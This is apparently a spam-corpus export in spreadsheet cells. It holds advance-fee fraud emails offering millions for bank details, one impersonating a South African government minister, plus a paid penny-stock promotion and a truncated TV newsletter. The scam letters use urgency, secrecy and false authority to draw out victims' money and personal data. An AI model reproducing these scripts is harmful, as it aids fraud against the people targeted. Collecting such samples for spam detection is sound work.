[URL]http://www.state.gov[/URL] \n \n I decided to flee my country, as I desired a peaceful life, and I no more had interest in conflicts and wars. \n \nTo the point, the essence of my contact with you is to seek your most needed assistance to siphon US$18,500,000 left in the bunker of my Dads Private Palace. Only my Dad and me knew about this fund. Now that my Dad is dead, I intend to use this money for my personal benefit (as well as yours if you accept to be my partner). I see justification in diverting the money, rather using it to support the purchase of weapons for destruction of innocent lives and properties.\nThis money has been moved in cash in a trunk to my present location in Europe through diplomatic means. I plan to invest this money in diversified projects, and relocate to a private location. As you can understand, the kind of trust and confidence I want to place in you is extraordinary, and an act of desperation on my part, in order have my plans achieved in the shortest possible time. When the trunk is claimed, we shall firstly have the money deposited into an Offshore account in your name, as I am being discrete of using my name for now. Then you shall have your own share withdrawn to an account of your choice, and leave the rest as fixed deposit, for release to me at the appropriate time for the investments and my relocation. \nAlso, ensure that this contact with you should be treated with utmost secrecy. Be informed that I am confiding in you by disclosing all this information to you, hence it is only me (apparently you now) that have knowledge of this. The importance of prosecuting this within the next few days cannot be overlooked; hence your immediate response will be highly appreciated.\nIf you accept to assist me, for your reliable assistance, I will reward you with 15%($2,775,000) of the money. \nOn hearing from you, I shall disclose my location to you, and explain details of your role in this. Furthermore, everything regarding this process will be legally processed for transfer of ownership to you, and this transaction should be completed in a very short while, depending on your prompt response.\nI thank you in advance as I anticipate your assistance in enabling me achieve this goal. \nPlease contact me whether or not you are interested in assisting me. This will enable me scout for another partner in the event of non-interest on your part.\nSincerely,\nJ.C.G.  </t>
  </si>
  <si>
    <t>http://www.state.gov</t>
  </si>
  <si>
    <t>1163</t>
  </si>
  <si>
    <t>To: nan\nFrom: Dr.Joel Williams &lt;joelwilliams1191@yahoo.es&gt;\nDate: Tue, 01 Mar 2005 12:44:33 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Mar 2005 12:44:33 +0000</t>
  </si>
  <si>
    <t>Dr.Joel Williams &lt;joelwilliams1191@yahoo.es&gt;</t>
  </si>
  <si>
    <t>Reply Urgently</t>
  </si>
  <si>
    <t>FROM: Dr.Joel Williams(PHD),\nGRAND FINANCE AND TRUST BANK.\nRUE CLUB DE L' AMITIE,\n0251 B.P. 1625 COTONOU,\nBNIN REPUBLIQUE.\n\n\n\nMy Dear Friend,\n\n  In Oder to transfer to overseas $28.5 million(USD)\nfrom GRAND FINANCE AND TRUST BANK,Bnin Republique.\nI want to  ask you to quietly look for a reliable\nand honest person who will be capable and fit to provide\neither an existing bank account or to set up a new  Bank\na/c immediately to receive this money, even an empty a/c\ncan serve to receive this funds quitely.\n\nI am Dr.Joel Williams(PHD), the accountant/auditor of\nthe above Finance Corporation in Cotonou,Bnin Republique \nand personal confidant to Mr.Alvaro Quesada \nof Dominican Republic in Caribbean Island who died in a Plane \nCrash accident(2002-04-19) on his way to attend a weddind \nceremony together with his wife and only Child (Alvaro Jr).\n\nMr.Alvaro Quesada, is From Dominican Republic in Caribbean Island,\nand a prosperous Tobacco merchant, he died in the year 2002 \nwithout having any beneficiary to his assets including his account \nhere in Bnin which he opened in the above stated bank in the year\n2001 as his personal savings for the purpose of expansion\nand developement of his company in Africa before his\nuntimely death in 2002.Until his death,he was the president \nof the Dominican Tobacco Exporters Association.\n\nAnd from my Investigation,i found out that No other person\nknows about this account because he( Mr.Alvaro Quesada )\nnever knew that he is going to die so soon, and so\nhis purpose was not achieved. If i don't remit this money\nimmediately, it will get lost(may be it will go into the\npockets of the corrupt government officials who will never\nuse it for any reasonable thing at all).\nI dont want to miss this opportunity because it comes ones\nin a life time.\n\nThe amount involved is $28.5 million(USD)Twenty eight\nmillion,five hundred United States Dollars and no other \nperson knows about this account. I am contacting you for \nus to transfer this funds to your account as the beneficiary, \nI want to first transfer $16,000.000.00(Sixteen million USD)  \nfrom this money into a safe account abroad, after which we\nwill transfer the remaining (12.5M).  I am only contacting\nyou as a foreigner because this money cannot be approved\nto a local person here, without a valid foreign\ninternational  passport, but can only be approved to any\nforeigner with valid international passport or drivers\nlicense and foreign a/c, this is because the money is in\nUS Dollars and the former owner of the a/c, Alvaro Quesada\nis a foreigner too, and as such the money can only be\napproved into a foreign a/c.\n\nHowever,  I am revealing this to you with belief in God\nthat you will never let me down in this business.I don't\nknow you and have never seen you before,i only got your\ncontacts from an international directory which my\nsecretary provided for me. You are the first and the only\nperson that I am contacting for this business, so please\nreply urgently so that I will inform you the next step to\ntake. Send also your private telephone and fax number.\n\nI need your full co-operation to make this work because\nthe management is ready to approve this payment to any\nforeigner who has correct information of this account,\nwhich I will give to you, upon your positive response and\nonce I am convinced that you are capable and will meet up\nwith instruction of a keybank official who is deeply\ninvolved with me in this business.\nI want to tell you that this transaction is 100% risk free\nand legal because all the documents that will back up this\ntransaction will be available, so that no body will\nquestion the fund when it is finaly tranfered to your\naccount.\n\nAt the conclusion of this business, you will be given 40%\nof the total amount and 60% will be for me. I look forward\nto your earliest reply through this email.\n\n\nThanks for your time.\n\nYour's faithfully,\n\nDr.Joel Williams(PHD,)\n\n\n\n-----------------------------------------------\nThis mail sent through [URL]http://webmail.zoom.co.uk[/URL]\n\n\n</t>
  </si>
  <si>
    <t>733</t>
  </si>
  <si>
    <t>To: shabang2susan@webmail.co.za\nFrom: susan shabangu &lt;shabang2susan@webmail.co.za&gt;\nDate: Tue, 01 Jun 2004 14:56:14 +0200</t>
  </si>
  <si>
    <t>Tue, 01 Jun 2004 14:56:14 +0200</t>
  </si>
  <si>
    <t>susan shabangu &lt;shabang2susan@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>shabang2susan@webmail.co.za</t>
  </si>
  <si>
    <t>CONFIDENTIAL AND VERY URGENT FROM SUSAN</t>
  </si>
  <si>
    <t>ATTN: THE DIRECTOR\n \n\nFROM:  MRS. SUSAN  SHABANGU\nSOUTH AFRICA\n\n\n{MY CONTACT\nPRIVATE EMAIL\n{susanshabangu00@netscape.net}\n\n{MY SON CONTACT NUMBER+27-73-323-0163} \n\n\n\nDear Sir,\n\n\nFirst, let me start by introducing myself as MRS SUSAN\nSHABANGU,a mother of three children and the Deputy Minister\nof Safety and Security since 29th  April 1996 to date under\nthe auspices of the President of South Africa MR THABO\nMBEKI.\n\nAfter due deliberation with my children, I decided to\ncontact you for your assistance in standing as a\nbeneficiary to the sum of US$30.5M ( Thirty Million, Five\nHundred Thousand United States Dollars Only) You can view\nmy profile at my website [URL]www.gov.za[/URL]  click on, Contact\nInformation, then click on Deputy Minister, and finally,\nclick on Safety and Security  and read about me. THE\nPROPOSAL, After the swearing in ceremony making me the\nDeputy Minister of Safety and Security, my husband Mr.\n Ndelebe  Shabangu died while he was on an official trip to\nTrinidad and Tobago in 1996.\n\nAfter his death, I discovered that he had some funds in a\ndollar account which amounted to the sum of US$30.5M with a\nsecurity and finance institution in South Africa  of which\nI will divulge information to you when I get your full\nconsent and support to go for a change of beneficiary and\nsubsequent transfer of the funds into you a comfortable and\nconducive account of your choice.\n\n This fund emanated as a result of an over-invoiced\ncontract  which he executed with the Government of South\nAfrica. Though I assisted him in getting this contract but\nI never knew that it was over-invoiced by him. I am afraid\nthat the government of South Africa might start to\ninvestigate on contracts awarded from 1990 to date. If they\ndiscover this money in his bank account, they will\nconfiscate it and seize his assets here in South Africa and\nthis will definitely affect my political career in\ngovernment. I want your assistance in opening an account\nwith bankers through my banker so that this fund could be\nwired into your account directly without any hitch. As soon\nas the fund gets to your account, you are expected to move\nit immediately into another personal bank account in your\ncountry.\n\n I will see to it that the account is not traced from South\nAfrica. As soon as you have confirmed the fund into your\naccount, I will send my eldest son with my Attorney to come\nto your country to discuss on business investments. For\nyour assistance, I am offering you 20% of the principal sum\nwhich amounts to US$6,100.000.00 (Six million One Hundred\nThousand United States Dollars Only)And 5% will be for Any\nexpenses that both of us may Incure in this transaction.\nAnd another 5%will go for Motherless babes home.\nHowever, you have to assure me and also be ready to go into\nagreement with me that you will not elope with my fund. If\nyou agree to my terms, kindly as a matter of urgency send\nme an email. Due to my sensitive position in the South\nAfrican Government, I prefer you send me email than call.\nAll correspondence must be by email to my private email\naddress, {susanshabangu00@netscape.net} If you want to\nspeak with my Banker or my elder son,that is fine and okay\nby me.you can contact my son on his dilect line\n{+27-73-323-0163}his name is {MR Morris shabangu}and You\nwill have to send down you private telephone /fax number so\nthat i can forward it to him to reach you from time to time\nthis is for security reasons. Please I do not need to\nremind you of the need for absolute Confidentiality of this\ntransaction.If you do not feel comfortable with this\ntransaction, do not hesitate to discontinue. \n\n \nThanks for your anticipated co-operation and my regards to\nyour family. \n\n \nYours faithfully, \n  \n\nMRS. SUSAN SHABANGU \n\nDeputy Minister of Safety &amp; Security,\n\nSouth Africa.\n\n\n\n_____________________________________________________________________\nFor super low premiums ,click here [URL]http://www.dialdirect.co.za[/URL]\n\n</t>
  </si>
  <si>
    <t>www.gov.za http://www.dialdirect.co.za</t>
  </si>
  <si>
    <t>734</t>
  </si>
  <si>
    <t>To: cbforg_1@hotmail.com\nFrom: hubert kliuvert &lt;cbforg_1@hotmail.com&gt;\nDate: Tue, 01 Jun 2004 14:12:58 +0100</t>
  </si>
  <si>
    <t>Tue, 01 Jun 2004 14:12:58 +0100</t>
  </si>
  <si>
    <t>hubert kliuvert &lt;cbforg_1@hotmail.com&gt;</t>
  </si>
  <si>
    <t>cbforg_1@hotmail.com</t>
  </si>
  <si>
    <t>CHARITABLE</t>
  </si>
  <si>
    <t>CENTRAAL BUREAU FONDSENWERVING\nanthony  forkkerweg i\n1059 CM  AMSTERDAM\n\nAMSTERDAM,THE NETHERLANDS.\n\nDEAR SIR/MADAM,\n\nRE: FUND TO INVEST IN CHARITABLE ORGANIZATIONS IN YOUR COUNTRY TOTALLING \nFIVE MILLION EUROS (EUROS 5,000,000.00).\n\nI am a Director in a non profit organization  known as (CENTRAAL BUREAU \nFONDSENWERVING) in AMSTERDAM,THE NETHERLANDS.\nWe came across your e-mail address, when we organized a random Balotting \nlottery in searching for a reputable,capable individual or organization  in \nyour country that would manage the Funds prudently.As a result,your name was \nselected.\n\nMy organization has approved the sum of FIVE MILLION EUROS ONLY (EUROS \n5,000,000.00). ) as a  NON RE-PAYBLE Fund to be given to you to invest in \ncharitable organizations in your country. Upon the release of this Funds to \nyou, we will  send an agent to your country to monitor the impact made to \ncharitable organizations on a periodic basis.\n\nIf you are ready to obtain the Funds as stated above,kindly e-mail to me \nyour telephone and fax numbers.I will inform you of the next step on the \nprocess of securing the Funds.\n\nI await your prompt reply.\n\nBest Regards,\n\nHUBERT KLUIVERT\n(DIRECTOR).\nCENTRAAL BUREAU  FONDSENWERVING\nAMSTERDAM,THE NETHERLANDS\n\n_________________________________________________________________\nMSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. \n[URL]http://join.msn.com[/URL]\n\n</t>
  </si>
  <si>
    <t>735</t>
  </si>
  <si>
    <t>To: mich_williams02@zwallet.com\nFrom: nan\nDate: Tue, 01 Jun 2004 13:46:34 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Jun 2004 13:46:34 +0000</t>
  </si>
  <si>
    <t>mich_williams02@zwallet.com</t>
  </si>
  <si>
    <t>CALLING FOR YOUR  ASSISTANCE</t>
  </si>
  <si>
    <t>MR MICHAEL  WILLIAMS\nAvenue 15,rue 12\nLot 1225,Deux Plateau\nAbidjan-Coted'ivoire\n\nMy Dear \nIt's my pleasure to contact you for a business venture which I intend to establish in your country,Though I have not met with you before but I believe one has to risk, confiding in someone to succeed some times in life.\n\nThere is this huge amount of money Ten million,Seven hundred thousand U.S dollars($10.7million usd) which my FATHER kept for ME in a security storage house in ABIDJAN before he was assasinated by unknown person.\n\nNow I have decided to invest this huge amount in your country or anywhere safe enough outside Africa for security purposes.I want you to assist me in transfering this fund to your account for investment purposes.\n\nSo if you can be of an assistance to us we will be pleased to offer to you 20% Of the total fund.\n\nI anticipate your urgent response.\nThanks and God bless.\nSincerely\nMR MICHAEL  WILLIAMS\n\n\n______________________________________________________\nGet Paid... With Your Free Email at\n[URL]http://www.zwallet.com[/URL]\n\n</t>
  </si>
  <si>
    <t>1106</t>
  </si>
  <si>
    <t>To: nan\nFrom: MR SHAKIR ABDUL &lt;shakir_abdul1@rediffmail.com&gt;\nDate: Tue, 01 Feb 2005 15:02:36 +0400</t>
  </si>
  <si>
    <t>Tue, 01 Feb 2005 15:02:36 +0400</t>
  </si>
  <si>
    <t>MR SHAKIR ABDUL &lt;shakir_abdul1@rediffmail.com&gt;</t>
  </si>
  <si>
    <t>DEAR FREIND</t>
  </si>
  <si>
    <t>\nFROM MR. SHAKIR ABDUL  \nDIRECTOR IN CHARGE OF \nAUDIT AND ACCOUNTS UNIT,\nFOREIGN REMIITANCE DEPT.\nOF AFRICAN DEVELOPMENT BANK(ADB)\nEAST AFRICA.\n\n\n                     STRICTLY PERSONAL AND CONFIDENTIAL.   \n       \n\n\nWith due respect, I am Mr. SHAKIR ABDUL,the director in charge of audit \nand accounts unit,foreign remittance dept.of the AFRICAN DEVELOPMENT \nBANK (ADB),TANZANIA IN EAST AFRICA. I decided to contact \nyou for a beneficial and risk-free business transaction.\n\nDuring our auditing and investigations in this bank,my department came \n\nacross the sum of (US$35,000,000.00) THIRTY-FIVE-MILLION UNITED STATES \nDOLLARS ONLY, belonging to an international business man who \ndied along with his family on the 31st October 1999 in a plane crash, \nin an Egyptian airline ( Egypt- Air) 990 - with other passengers on board. \nYou can confirm this from the website below which was published by \nCNN.WEBSITE.[URL]http://www.cnn.com[/URL]\nOR [URL]www.theatlantic.com[/URL] .\n\nBefore our discovery of this development, there was no trace of claim \nfrom\nany person as the fund remains dormant in his account with this bank. \nAlthough\nI keep this information secret whitin my jurisdiction to enable us put \nclaims\nand transfer the said amount through a trustworthy friend overseas whom\nwe shall indirectly present to the bank as the bonafide next-of-kin to \nthe deceased for a profitable and successful transaction - Because \nafter five\nyears the money will be called back to the bank's treasury account \nas unclaimed\nbills and the money shared amongst the directors of the bank. So it is \non this note that i decided to seek for a foreign assistance whom his \nname shall be \nused as the next of kin/beneficiary to this funds rather than allow the bank directors to\nshare this money amongst them at the end of the year.\n\nMeanwhile, all the arrangments/documents to put claims as the bonafide \nnext-of-kin to the deceased,to get the required approval and transfer \nof\nthis money to a foreign account has been put in place.The directives \nand\nthe needed informations will be relayed to you as soon as you indicate \nyour\ninterest and willingness to cooperate fully.Infact, we could have done\nthis alone but because as civil servants we are not legally allowed to \noperate foreign account in our country and it would eventually raise \nan eyebrow on our side during the time of transfer because we are \nstaffs of the bank.These are the actual reasons why it requires a \nsecond-fellow who will forward claims by our indirect support\nas the bonafide next-of-kin.And also present a foreign bank account\n(Old or New account)where the money will be transfered into.\n\nOn conclusion of this transaction, you will be entitled to 25% of the \ntotal sum as gratification, 5% of the total sum will be set aside for \ncontingency,while 70% will be for me and my partners here.\nPlease you have been advised to keep top secret as we are still in \nservice and intend to retire from service after we conclude this with \nyou.I will be monitoring the whole situation here in this bank until \nyou confirm the money in your account,We then come down to your country\nfor subsequent sharing of the fund according to the percentages \nindicated above, and for investment purpose like in any country you \nmay as well advise us professionally on how to invest the money.\nAll other necessary informations will be sent to you when i receive \nan email response from you or a telephone call.\n\nPls. You can mail me anytime via the above email address for \nconfidential purpose.\n\nExpecting your urgent response.   \n\nYours Sincerely,\n\nSHAKIR ABDUL.\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com www.theatlantic.com</t>
  </si>
  <si>
    <t>1105</t>
  </si>
  <si>
    <t>To: janeabbs13@yahoo.co.in\nFrom: jane abbs &lt;janeabbs13@yahoo.co.in&gt;\nDate: Tue, 01 Feb 2005 09:16:27 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Feb 2005 09:16:27 +0000</t>
  </si>
  <si>
    <t>jane abbs &lt;janeabbs13@yahoo.co.in&gt;</t>
  </si>
  <si>
    <t>janeabbs13@yahoo.co.in</t>
  </si>
  <si>
    <t>URGNT ASSITANCE PLEASE  1</t>
  </si>
  <si>
    <t>FROM: MRS,JANE ABBAS \n\nPhone:+27-736112897\n \nATTN:DIRECTOR/CEO \n\nIam Mrs. JANE ABBAS, the wife of the former adviser\nsuliman H. Abbas, who is in charge of arms and\nacquisition to the current president of Sierrelone,\nHis excellency, Ahmed Kabbah.Following the civil war\nin my country, the head of state delegated my husband\nto arrange for arm purchase from republic of south\nAfrica through independent arms dealer. He was\ndirected to purchase arms worth TWENTY FIVE MILLION\nUNITED STATES DOLLARS (US$25 000,000.00.) On arrival\nin South Africa through diplomatic means, he deposited\nthe  in a private  company with the name of our first\nson Ahmed Abbas and declared it to be official\nconsignment belonging to his foreign affiliate in\nholland \n\nOn getting back home he was hijacked and killed by\nunknown people, I became widow over night. God so\nkind, all the papers for deposition of this  with the \ncompany is with us, I did not waste time to run away\nwith my sons and daughter to the republic of south\nAfrica. On getting to South Africa, we could not find\nit easy to bring the consignment out off the  Company,\nthey demanded for foreign partner information that is\nbassed in holland. Due to these, For that we are\nlooking for a reliable trustworthy person who can help\nus to transfer this to His or Her private account\noversea. \n\nI ran into your name through net work search and I\ndecided to contact you and see if you could be of any\nhelp to us. We intend to compensate you with 25% of\nthe total sum, if you agree in transferring this  into\nany of your account oversea. 5% will be mapped out in\ncase of any country of which you will be guide to us\nin your country. \n\nPlease should this meet your utmost consideration,\nplease contact me through the above specified email\naddresss, please feel free to ask a question you\nconsider necessary. This transaction is 100% risk\nfree,Please include your private telephone and fax\nnumber for easy communication. Remember to keep this\ntransaction secret for  reason. \n\nI expect your urgent call as soon as possible or \n[e-mail:janeabbs13@yahoo.co.in / thanks and remain\nblessed. \n\nBest Regards \n\nMRS. JANE ABBAS. \n\n\n\n\n\n\n\n\n		\n__________________________________ \nDo you Yahoo!? \nYahoo! Mail - now with 250MB free storage. Learn more.\n[URL]http://info.mail.yahoo.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>2391</t>
  </si>
  <si>
    <t>To: florenceeteh@latinmail.com &lt;florenceeteh@latinmail.com&gt;\nFrom: Florence Eteh &lt;florenceeteh@latinmail.com&gt;\nDate: Tue, 01 Aug 2006 20:04:25 +0200</t>
  </si>
  <si>
    <t>Tue, 01 Aug 2006 20:04:25 +0200</t>
  </si>
  <si>
    <t>Florence Eteh &lt;florenceeteh@latinmail.com&gt;</t>
  </si>
  <si>
    <t>florenceeteh@latinmail.com &lt;florenceeteh@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM FLORENCE</t>
  </si>
  <si>
    <t>FROM MISS FLORENCE ETEH\nIVORY COAST WEST AFRICA \nDEAREST ONE\n\nI AM MISS FLORENCE ETEH FROM IVORY COAST AND I AM CONTACTING YOU BECAUSE I \nNEED YOUR HELP IN THE MANAGEMENT OF A SUM OF MONEY THAT MY DEAD FATHER \nLEFT FOR ME BEFORE HE DIED.THIS MONEY IS USD ($7,500,000) MILLION AMERICAN \nDOLLARS AND THE MONEY IS IN A SECURITY COMPANY HERE IN ABIDJAN. \n\nMY FATHER WAS A VERY RICH COCOA FARMER AND HE WAS POISONED BY HIS \nBUSINESS COLLEAGUES AND NOW I WANT YOU TO STAND AS MY GUIDIAN AND APPOINTED \nBENEFICIARY AND RECEIVE THE MONEY IN YOUR COUNTRY SINCE I AM ONLY 22 \nYEARS AND WITHOUT MOTHER OR FATHER. \n\nPLEASE I WILL LIKE YOU TO REPLY TO THIS EMAIL SO THAT I WILL TELL YOU \nALL THE INFORMATION IN SHIPING THE CONSIGNMENT OF MONEY TO YOU SO THAT \nYOU WILL GET ME PAPERS TO TRAVEL TO YOUR COUNTRY TO CONTINUE MY \nEDUCATION THERE.I AM WAITING FOR YOUR URGENT REPLY AND I WILL CALL YOU AS SOON \nAS I HEAR FROM YOU. I AM SENDING TO YOU A COPY OF MY PICTURE SOTHAT YOU \nWILL KNOW THE PERSON YOU ARE HELPING. \n\nTHANKS. \n\nPLs reply me with this my email adds; f_eteh101@yahoo.ca\n\nMISS FLORENCE  ETEH\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>5170</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: special@ds1.nurel.net\nDate: Tue,  9 Jul 2002 20:28:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue,  9 Jul 2002 20:28:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>special@ds1.nurel.net</t>
  </si>
  <si>
    <t>A Situation That Could Revolutionize the Health Care Industry</t>
  </si>
  <si>
    <t>Date: Tuesday, July 9, 2002 IBXG E-mailer 7/9/02   Rapid          Growth Health Care Company: Stock Symbol IBXG Trading Around          16 Cents           Market Watch Corporation REVENUES          TO SOAR OVER 500% TO $18 MILLION FOR          OTC-BB "IBXG"          ACQUISITION OF TWO CYBERCARE, INC. OPERATING UNITS MOVES FORWARD   OTC-BB Symbol: IBXG Shares Outstanding (est.): 38,983,380 Float (est.): 7,887,966 Recent Price: 16 cents Year Low/High: $0.10 - $0.90 Contact: 561-998-3435 Websites: Market          Watch Corporation, iBX Group, Inc. Press Releases: IBXG          Press Releases  A          Situation That Could Revolutionize the Health Care Industry     STRONGHEALTHCARESECTORGROWTH                Most investors desire to be in a stock from the beginning                of its growth, IBXG is one of those opportunities.                Revenues to increase over 500 %                to over $18 Million from $3 Million with its                pending acquisition of 47 physical therapy outpatient centers and                institutional pharmacy businesses, currently owned by CyberCare,                Inc. IBXG also just announced a national alliance                with Patient-Pay.com                that will enable IBXG to market its services on a                national scale. We believe the potential is enormous for this expanding                dynamic Health Care Information Technology Company. HEALTHCARESECTORREREPRESENTS15%OFTHETOTALUS                GROSSDOMESTICPRODUCT While inflation                in the US has been around 2% per year, the US Health Cares                inflationary rate rose over 11% per year. Health care costs are                spiraling out of control. IBXG provides technology                based products and services in full compliance with newly mandated                government requirements (HIPAA), that help medical professionals                save time and money, by utilizing IBXGs state of the                art systems. UNDERSTANDINGHIPAA                The Health Insurance Portability and Accountability Act of 1996                (PublicLaw104-191),                also known as HIPAA, was enacted as part of a broad Congressional                attempt at incremental healthcare reform. Part of the law requires                the US Dept. of Health and Human Services (DHHS) to develop standards                and requirements for maintenance and transmission of health information                that identifies individual patients. The requirements outlined by                the law are far-reaching for all healthcare organizations that maintain                or transmit electronic health information must comply. IBXG                offers all health care providers with a viable, already in place                solution to HIPAA compliance. IBXGSPECIALIZESINHEALTHDATAMANAGEMENT                It is a huge market comprised of over one million health care professionals.                This company has emerged, with solutions to many problems facing                the Health Care Industry, by providing health care professionals                the ability to deliver outstanding patient care with optimum efficiency.                In past years, venture capitalists have invested more than $20 billion                in information technology companies, confirming a very large financial                interest in the health care sector.               WILLIBXGREVOLUTIONIZETHEHEALTHCAREINDUSTRY?                They could. Virtually every aspect of the way health care is delivered                is impacted in a positive fashion, by IBXG's technology. IBXG has                developed and deployed innovative, cost-effective methods for integrating                financial, administrative and information services for the health                care industry. Utilizing in-house development capabilities combined                with the latest technologies and Internetbased communication                services, IBXG assists hospital-based physician groups,                multi-physician specialty practice and health care service organizations                in managing the efficiency of account receivable, workflow and compliance.virtually                every aspect of the way health care is delivered. Imagine your doctor                being able to access your medical records from any location, anywhere                in the world . . . instantly!    OUTSTANDING              RECENT DEVELOPMENTS  Revenues to increase over 500% to $18                  MILLION.   National alliance with Patient-Pay.Com.                 Wall Street Corporate Reporter interview, available                  here                  July 15, 2002.                 Significant gains in quarterly year to year revenues.                Extension of agreements with Intracoastal Health Systems and                  Providence Hospital (one of Ascension                  Health Groups 87 affiliated hospitals).                 Increased revenues with Cerberus Capital Management, L.P.,a                  multi-billion dollar New York hedge fund.                 Service contract with MDVIP,                  MDVIP was featured in an NBC Nightly News Tom                  Brokaw interview.                 Acquired Sportshealthnet.com.                 Contract with award winning software company, Millbrook                  Software Corporation for additional revenue.                 Two national product launches were announced, one for the $1.5 BILLION durable medical equipment industry and the                  other a proprietary online consumer medical reports and information                  service.                 Alliance with Sun                  Capital that will allow IBXG to offer accounts receivable                  funding programs nationwide.                 Extended partnership alliance with Advanced Information Technologies                  that taps the $5 BILLION document management industry.                 Alliance with Digital                  Ingenuity to provide Internet- protocol telephony                  services (a billion-dollar industry).                  Disclaimer          &amp; Disclosure: Market Watch Corporation is not a registered          financial advisory. The information presented by Market Watch Corporation          is not an offer to buy or sell securities. Market Watch Corporation accumulates          information based from public sources and the advertised company, then          distributes opinions and comments. Penny stocks are considered to be highly          speculative and may be unsuitable for all but very aggressive investors.          Market Watch Corporation may hold positions in companies mentioned and          may buy or sell at any time. This profile of IBXG was a paid advertisement          by IBXG. IBXG has paid Market Watch Corporation $3,500 for this advertisement          and 750,000 restricted shares for investor awareness services for one          year, an affiliated company of Market Watch Corporation has been paid          250,000 restricted shares of IBXG stock from a third party shareholder.          Please always consult a registered financial advisor before making any          decisions. Information within this advertisement contains forward looking          statements within the meaning of Section 27(e) of the U.S. Securities          Act of 1933 and Section 21(g) of the U.S. Securities Exchange Act of 1934          and the Private Securities Litigation Reform Act Of 1995. Forward looking          statements are based on expectations, estimates and projections at the          time the statements are made that involve a number of risks and uncertainties          which could cause actual results or events to differ materially from those          presently anticipated. Forward looking statements may be identified through          the use of words such as expects, will, anticipates, estimates, believes,          or by statements indicating certain actions may, could or might occur.          We encourage our readers to invest carefully and read the investor information          available at the Web sites of the U.S. Securities and Exchange Commission          (SEC) at [URL]http://www.sec.gov[/URL] and/or the          National Association of Securities Dealers (NASD) at [URL]http://www.nasd.com[/URL]          Readers can review all public filings by companies at the SECs          EDGAR page. The NASD has published information on how to invest carefully          at its Web site. You are receiving        this message because you subscribed on one of our partner sites using the        refer a friend page. We value privacy as our clients demand it and we        will gladly unsubscribe you upon request. To send a request, simply       click here and follow directions. We        guarantee that you will be unsubscribed within 48 hours. Nurel is        only the delivery source for this message. Under SEC rules, we are        required to inform you that we were paid three thousand five hundred        dollars (US) for our services which is limited to the delivery of this        message only.  Thank you. (c) 2002 Nurel ApplyLeads v3.2 Commercial E-mail List Manager. [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.sec.gov http://www.nasd.com http://xent.com</t>
  </si>
  <si>
    <t>5737</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: PHIL SWANN &lt;swann@TVPredictions.com&gt;\nDate: Tue,  6 Aug 2002 23:24:00 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue,  6 Aug 2002 23:24:00 -0400 (EDT)</t>
  </si>
  <si>
    <t>PHIL SWANN &lt;swann@TVPredictions.com&gt;</t>
  </si>
  <si>
    <t>Special Report! TiVo: Now or Never?</t>
  </si>
  <si>
    <t>------=_Part_1210763_-1358544416.1028690797657 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit TVPredictions.com Newsletter (August 7, 2002) The #1 Newsletter on the Future of TV Hi Everyone, First of all, I want to welcome those subscribers who are getting this newsletter for the first time. Here you will find  hard-hitting commentary and analysis on issues related to the future of television. Whether it's Interactive TV, the battle between the cable news networks, the latest in  the Emmy race, or the federal government's fight to promote HDTV, TV Predictions will  give you the scoop -- before it actually  occurs. And, as long-time subscribers will tell you, we pull no punches.  (FYI -- TVPredictions.com, based in Los  Angeles, is owned and managed by Phillip Swann, author of "TV dot Com: The Future of  Interactive Television." He has been  quoted as an expert on TV issues in publications such as The Hollywood Reporter, Variety and  Electronic Media.)  Now, in this issue, we offer an all-new edition of... the Interactive TV Power Rankings! Plus: Why TiVo desperately needs to boost its sub numbers during the next five months. And, the latest news on  the future of TV.  ------------- IN THIS ISSUE ------------- Interactive TV Power Rankings! TiVo: Now or Never? Breaking News Coming Attractions! ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;     Be a Star! ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt; [URL]http://rs6.net[/URL] By advertising today in  TVPredictions' weekly newsletter! Reach more than  3,000 subscribers, including TV's top decision-makers.  Promoting an Event? Selling a New Service? Looking for Brand Awareness? Well..advertise already!! Past advertisers include: American Film Institute The Carmel Group ISeeTV Iacta Espial Learn how YOU can reach our targeted audience, by clicking below or sending an e-mail to: advertising@ TVPredictions.com  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Interactive TV Power Rankings! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [URL]http://rs6.net[/URL] Every week, we publish the Interactive  TV Power Rankings. We rank the 10 companies that are benefiting most from the deployment of new TV technology.  This week's highlights: Will the FCC approve the Echostar-DIRECTV merger?; why did Cox scale back its Video on Demand plans?; why did Liberty Media buy a cable company in the Netherlands?; and  who at NBC is smoking crack? Find out in this all-new edition of... The Interactive TV Power Rankings! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TiVo: Now or Never? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [URL]http://rs6.net[/URL] Ready for this? The next five months could determine whether  TiVo, the Personal Video Recorder service, ultimately survives as a business. TiVo, which launched five years ago, has less  than 500,000 subscribers. The company's stock dipped below three this week. And network execs are openly questioning whether the digital recorder, which permits skipping commercials with a few  clicks of the remote, will destroy their advertising models. There even have been hints that the  networks could support a move by the cable  industry to offer a PVR that does not permit commercial skipping. And that PVR would not  be a TiVo.  To its credit, TiVo has been remarkably successful  at building brand loyalty and awareness. TiVo  reports that 97 percent of its subscribers have recommended the service to a friend. And when people talk about PVRs, they say TiVo. (Just  like the way people say "Coke" when they talk about soft drinks. ) But Wall Street, the media and the industry  are all growing impatient. TiVo needs to start putting some big numbers on the board --  and it needs to do it this holiday season. If  it doesn't, stock analysts who have supported TiVo  until now will run for the hills. That will push the company's stock price down even further. And if that happens, TiVo could have just two choices: Sell the company under duress or wait until its  funding dries up.  Consequently, I predict that TiVo will launch  an 